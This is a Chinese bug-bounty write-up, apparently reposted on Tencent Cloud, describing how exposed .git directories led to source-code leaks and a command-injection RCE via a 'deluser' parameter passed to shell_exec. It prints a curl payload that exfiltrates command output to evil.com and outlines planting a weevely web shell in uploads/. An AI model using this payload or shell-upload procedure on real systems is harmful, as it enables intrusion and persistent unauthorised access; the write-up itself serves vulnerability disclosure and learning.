前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >从.Git泄露到RCE,赏金10,000美元!

从.Git泄露到RCE,赏金10,000美元!

作者头像
潇湘信安
发布2023-09-07 09:59:39
1650
发布2023-09-07 09:59:39
举报
文章被收录于专栏:潇湘信安

最近我参加了一个私人 bugbounty 计划,我设法通过四台主机上的开放 .git 目录找到了 RCE,为此我收到了创纪录的 10,000 美元,如果不分享它就是犯罪。

图片
图片

其实这个漏洞很简单,只用了半天时间,但大体上有条不紊……

收集容易发现的错误的主要阶段是信息收集,为此我在我的 bash 脚本中使用了一系列工具:

代码语言:javascript
复制
amass enum -active -d $1 -brute -w ~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -o amass.txt
cat amass.txt | aquatone -ports xlarge -out aqua_$1
nuclei -l aqua_$1/aquatone_urls.txt -t ~/nuclei-templates -es info -o nuclei_$1.txt

这不是最详细的信息收集手段,你可以自行决定添加其他工具,但它旨在扫描大量主机

幸运的是, nuclei的输出显示了几个主机上暴露的 .git/ 目录,通过这些目录可以下载源代码

图片
图片

为此,请使用git-dumper工具:

  • https://github.com/arthaud/git-dumper
代码语言:javascript
复制
git-dumper http://example.com/.git/ output

我认为这是在代码中寻找严重问题的好机会,并没有急于报告暴露的 .git,所以结果证明在代码中他们使用了对本地 bash 脚本的调用来通过 shell_exec 保存和删除 ftp用户()函数,它采用未经过滤的用户输入,这导致了 RCE 漏洞

为了验证测试请求包,我还必须考虑需要硬编码密钥的简单验证

图片
图片

以及请求的最终结果:

代码语言:javascript
复制
http://example.com/ftp-upload/sync.php?deluser=someuser&secret1=[secret1]&secret2=[sha1 encoded secret2]

入口点将是deluser参数

图片
图片

下一步是验证漏洞本身,为此我通过注入shell_exec()向我的服务器发出测试 curl 请求,该请求成功运行

图片
图片

也可以通过将命令发送到 URI 或通过 base64 编码形式的 POST 正文来读取命令的输出,如下所示:

id命令的payload:

代码语言:javascript
复制
someusr; curl https://evil.com/$(id|base64|tr -d "\n");
图片
图片
图片
图片

所以只剩下上传shell,唯一的障碍是对当前目录没有写权限,所以上传shell到uploads/ (生成shell,我用的是weevely工具)

  • https://github.com/epinna/weevely3
图片
图片

如果按步骤描述这个过程:

  • 1.将 shell 保存在本地 txt 中,以便能够通过 curl 传输它,并在自己的主机上启动服务器用 ngrok 建立隧道
  • 2.发送一个payload,将我们的 shell 保存在uploads/shell.php
  • 3.使用weevely连接到上传的 shell
图片
图片

经过几天的帮助解决问题后,该公司奖励了我一笔赏金(附上赏金截图)

图片
图片

在10个案例中,有9个我没有收到任何东西,有不同的公司欺骗了我,这就是耐心和一致性。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-07-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 潇湘信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档